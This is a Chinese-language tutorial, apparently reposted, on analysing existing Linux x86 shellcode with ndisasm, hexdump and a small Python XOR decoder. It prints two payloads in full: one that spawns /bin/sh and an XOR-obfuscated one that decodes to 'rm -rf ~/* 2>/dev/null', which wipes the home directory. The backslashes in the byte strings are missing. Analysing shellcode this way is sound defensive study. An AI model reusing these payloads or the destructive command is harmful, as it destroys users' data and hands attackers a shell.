Shellcode的分析调试方法
发布时间:2021-11-24 21:27:55 所属栏目:教程 来源:互联网
导读:下面,我们将分析几个已有的shellcode的功能,通过分析,了解shellcode分析的技巧。 第一个shellcode代码如下: static char shellcode[]= xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89 xf3x8dx4ex08x31xd2xcdx80xe8xe4
下面,我们将分析几个已有的shellcode的功能,通过分析,了解shellcode分析的技巧。 第一个shellcode代码如下: static char shellcode[]= "xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89" "xf3x8dx4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6e" "x2fx73x68x58"; 使用ndisasm反汇编结果如下: root@linux:~/pentest# echo -ne "xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6ex2fx73x68x58" | ndisasm -u - 00000000 EB17 jmp short 0x19 00000002 5E pop esi 00000003 897608 mov [esi+0x8],esi 00000006 31C0 xor eax,eax 00000008 884607 mov [esi+0x7],al 0000000B 89460C mov [esi+0xc],eax 0000000E B00B mov al,0xb 00000010 89F3 mov ebx,esi 00000012 8D4E08 lea ecx,[esi+0x8] 00000015 31D2 xor edx,edx 00000017 CD80 int 0x80 00000019 E8E4FFFFFF call dword 0x2 0000001E 2F das 0000001F 62696E bound ebp,[ecx+0x6e] 00000022 2F das 00000023 7368 jnc 0x8d 00000025 58 pop eax root@linux:~/pentest# 可以看出,这是一个执行“/bin/sh”的shellcode。 第二个shellcode代码如下: char shellcode2[] = "xebx10x5ex31xc9xb1x4bxb0xffx30x06xfexc8x46xe2xf9" "xebx05xe8xebxffxffxffx17xdbxfdxfcxfbxd5x9bx91x99" "xd9x86x9cxf3x81x99xf0xc2x8dxedx9ex86xcaxc4x9ax81" "xc6x9bxcbxc9xc2xd3xdexf0xbaxb8xaaxf4xb4xacxb4xbb" "xd6x88xe5x13x82x5cx8dxc1x9dx40x91xc0x99x44x95xcf" "x95x4cx2fx4ax23xf0x12x0fxb5x70x3cx32x79x88x78xf7" "x7bx35"; 下面使用ndisasm反汇编,结果如下: root@linux:~/pentest# echo -ne "xebx10x5ex31xc9xb1x4bxb0xffx30x06xfexc8x46xe2xf9xebx05xe8xebxffxffxffx17xdbxfdxfcxfbxd5x9bx91x99xd9x86x9cxf3x81x99xf0xc2x8dxedx9ex86xcaxc4x9ax81xc6x9bxcbxc9xc2xd3xdexf0xbaxb8xaaxf4xb4xacxb4xbbxd6x88xe5x13x82x5cx8dxc1x9dx40x91xc0x99x44x95xcfx95x4cx2fx4ax23xf0x12x0fxb5x70x3cx32x79x88x78xf7x7bx35" | ndisasm -u - 00000000 EB10 jmp short 0x12 00000002 5E pop esi 00000003 31C9 xor ecx,ecx 00000005 B14B mov cl,0x4b 00000007 B0FF mov al,0xff 00000009 3006 xor [esi],al 0000000B FEC8 dec al 0000000D 46 inc esi 0000000E E2F9 loop 0x9 00000010 EB05 jmp short 0x17 00000012 E8EBFFFFFF call dword 0x2 00000017 17 pop ss 00000018 DB db 0xdb 00000019 FD std 0000001A FC cld 0000001B FB sti 0000001C D59B aad 0x9b 0000001E 91 xchg eax,ecx 0000001F 99 cdq 00000020 D9869CF38199 fld dword [esi-0x667e0c64] 00000026 F0C28DED lock ret 0xed8d 0000002A 9E sahf 0000002B 86CA xchg cl,dl 0000002D C49A81C69BCB les ebx,[edx-0x3464397f] 00000033 C9 leave 00000034 C2D3DE ret 0xded3 00000037 F0BAB8AAF4B4 lock mov edx,0xb4f4aab8 0000003D AC lodsb 0000003E B4BB mov ah,0xbb 00000040 D6 salc 00000041 88E5 mov ch,ah 00000043 13825C8DC19D adc eax,[edx-0x623e72a4] 00000049 40 inc eax 0000004A 91 xchg eax,ecx 0000004B C0994495CF954C rcr byte [ecx-0x6a306abc],0x4c 00000052 2F das 00000053 4A dec edx 00000054 23F0 and esi,eax 00000056 120F adc cl,[edi] 00000058 B570 mov ch,0x70 0000005A 3C32 cmp al,0x32 0000005C 7988 jns 0xffffffe6 0000005E 78F7 js 0x57 00000060 7B35 jpo 0x97 root@linux:~/pentest# 接下来,我们将使用一个python脚本和hexdump来分析这个shellcode。 root@linux:~/pentest# cat decode.py #!/usr/bin/env python sc = "xebx10x5ex31xc9xb1x4bxb0xffx30x06xfexc8x46xe2xf9" + "xebx05xe8xebxffxffxffx17xdbxfdxfcxfbxd5x9bx91x99" + "xd9x86x9cxf3x81x99xf0xc2x8dxedx9ex86xcaxc4x9ax81" + "xc6x9bxcbxc9xc2xd3xdexf0xbaxb8xaaxf4xb4xacxb4xbb" + "xd6x88xe5x13x82x5cx8dxc1x9dx40x91xc0x99x44x95xcf" + "x95x4cx2fx4ax23xf0x12x0fxb5x70x3cx32x79x88x78xf7" + "x7bx35" print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])]) root@linux:~/pentest# ./decode.py | hexdump -C 00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |.%.../bin/sh.sh.| 00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>| 00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1.P.]| 00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S....1.| 00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 0a |......1.@...| 0000004c root@linux:~/pentest# 可以看到“/bin/sh”“sh”“rm –rf ~/* 2>/dev/null”几条指令,接下来我们使用ndisasm分析: root@linux:~/pentest# ./decode.py | ndisasm -u - 00000000 E825000000 call dword 0x2a 00000005 2F das 00000006 62696E bound ebp,[ecx+0x6e] 00000009 2F das 0000000A 7368 jnc 0x74 0000000C 007368 add [ebx+0x68],dh 0000000F 002D6300726D add [dword 0x6d720063],ch 00000015 202D7266207E and [dword 0x7e206672],ch 0000001B 2F das 0000001C 2A20 sub ah,[eax] 0000001E 323E xor bh,[esi] 00000020 2F das 00000021 6465762F gs jna 0x54 00000025 6E outsb 00000026 756C jnz 0x94 00000028 6C insb 00000029 005D31 add [ebp+0x31],bl 0000002C C0508D5D rcl byte [eax-0x73],0x5d 00000030 0E push cs 00000031 53 push ebx 00000032 8D5D0B lea ebx,[ebp+0xb] 00000035 53 push ebx 00000036 8D5D08 lea ebx,[ebp+0x8] 00000039 53 push ebx 0000003A 89EB mov ebx,ebp 0000003C 89E1 mov ecx,esp 0000003E 31D2 xor edx,edx 00000040 B00B mov al,0xb 00000042 CD80 int 0x80 00000044 89C3 mov ebx,eax 00000046 31C0 xor eax,eax 00000048 40 inc eax 00000049 CD80 int 0x80 0000004B 0A db 0x0a root@linux:~/pentest# (编辑:宁德站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |